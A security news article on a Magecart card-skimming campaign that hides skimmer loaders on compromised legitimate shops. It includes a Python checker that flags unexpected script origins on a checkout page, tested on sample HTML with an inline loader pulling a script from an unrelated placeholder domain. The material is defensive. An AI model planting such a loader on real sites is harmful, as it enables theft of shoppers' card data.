New Magecart campaign uses legitimate sites to host web skimmers

Akamai researchers have spotted a new credit card skimming campaign that hijacks legitimate websites to use them as “makeshift” command-and-control servers and host malicious code, unbeknownst to the victims.

The web security company said it identified victims in North America, Latin America, and Europe, some of them estimated to have hundreds of thousands of visitors per month, potentially putting tens of thousands of shoppers’ PII and credit cards at risk of being stolen and abused or sold on the dark web.

The primary objective of a Magecart attack is to steal personally identifiable information (PII) and credit card details from the checkout pages of digital commerce websites. In this recent campaign, threat actors have been observed exploiting sites running the Magento, WooCommerce, WordPress, and Shopify digital commerce platforms.

“Rather than using the attackers’ own C2 server to host malicious code, which may be flagged as a malicious domain, attackers hack into (using vulnerabilities or any other means at their disposal) a vulnerable, legitimate site, such as a small or medium-sized retail website, and stash their code within it. In this way, the attackers create a seemingly healthy host for their malicious code, and can deliver it to any victim they choose,” the researchers explained in a blog post.

It’s currently unclear how the threat actors breached the sites; they may have gained access via vulnerabilities in the targeted e-shops.

In some cases, the targeted websites were abused twice: both for hosting malicious code and as the target of a web skimming attack.

“Not only were they compromised and subjected to data theft by the injected code, but they also unwittingly served as a vehicle for spreading the skimmer's malicious activities to other vulnerable websites,” Akamai said.

The attack chain starts with the threat actors scanning the web for vulnerable legitimate sites and hacking them to inject malicious code. The attackers use small JavaScript snippets that act as loaders to fetch the final skimmer from victim websites that were compromised earlier.
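Because the skimmer is served from an otherwise legitimate retail site, a reputation check on the hosting domain says nothing about the loader's target; an explicit allowlist of the script origins a checkout page is expected to reach does. The following is an added example (not Akamai's code or tooling) that lists the origins a page reaches through `<script src>` and through URLs embedded in inline loader snippets, and reports any that are not allowlisted; the allowlist, the sample HTML and all domain names are constructed.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Hypothetical allowlist of origins this shop expects to load scripts from.
ALLOWED_ORIGINS = {"https://shop.example", "https://cdn.shop.example"}
# Absolute http(s) URLs inside inline JavaScript (e.g. a loader's target).
URL_RE = re.compile(r"https?://[A-Za-z0-9.-]+(?::\d+)?[^\s'\"]*")

class ScriptCollector(HTMLParser):
    def __init__(self):
        super().__init__()
        self.srcs, self.inline, self._in_script = [], [], False

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            src = dict(attrs).get("src")
            if src:
                self.srcs.append(src)
            else:
                self._in_script = True  # inline body arrives via handle_data

    def handle_endtag(self, tag):
        self._in_script = self._in_script and tag != "script"

    def handle_data(self, data):
        if self._in_script and data.strip():
            self.inline.append(data)

def origin(url, page_origin):
    p = urlparse(url)  # a relative src resolves to the page's own origin
    return f"{p.scheme or 'https'}://{p.netloc}" if p.netloc else page_origin

def unexpected_script_origins(html, page_origin, allowed=ALLOWED_ORIGINS):
    """Sorted origins reached via <script src> or via URLs inside inline
    scripts that are neither the page itself nor on the allowlist."""
    c = ScriptCollector()
    c.feed(html)
    found = {origin(s, page_origin) for s in c.srcs}
    for body in c.inline:
        found.update(origin(u, page_origin) for u in URL_RE.findall(body))
    return sorted(o for o in found if o != page_origin and o not in allowed)

# Constructed checkout page: an allowlisted CDN script, a same-origin script,
# and an inline loader fetching a second stage from an unrelated shop domain.
SAMPLE_HTML = """<script src="https://cdn.shop.example/checkout.js"></script>
<script src="/js/cart.js"></script>
<script>var s=document.createElement('script');
s.src='https://legit-looking-store.example/assets/jquery.min.js';document.head.appendChild(s);</script>"""
```

Run periodically against the live checkout page (or wire the same allowlist into a Content Security Policy `script-src` directive) so that a newly injected loader shows up as an unexpected origin regardless of how reputable its host looks.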

The researchers found two distinct variations of the skimmer code employed in the observed campaign.

The first skimmer variant is heavily obfuscated and contains a list of CSS selectors that explicitly indicate it targets the input fields used to capture PII and credit card details.

The second variant was less obfuscated and contained certain indicators that allowed Akamai to identify additional victims.

To plant a web skimmer, attackers need initial access to the server, either by exploiting a vulnerability or by abusing one of the existing third-party scripts, so organizations are advised to keep up with the most recent patches and to complement them with a Web Application Firewall (WAF) solution.
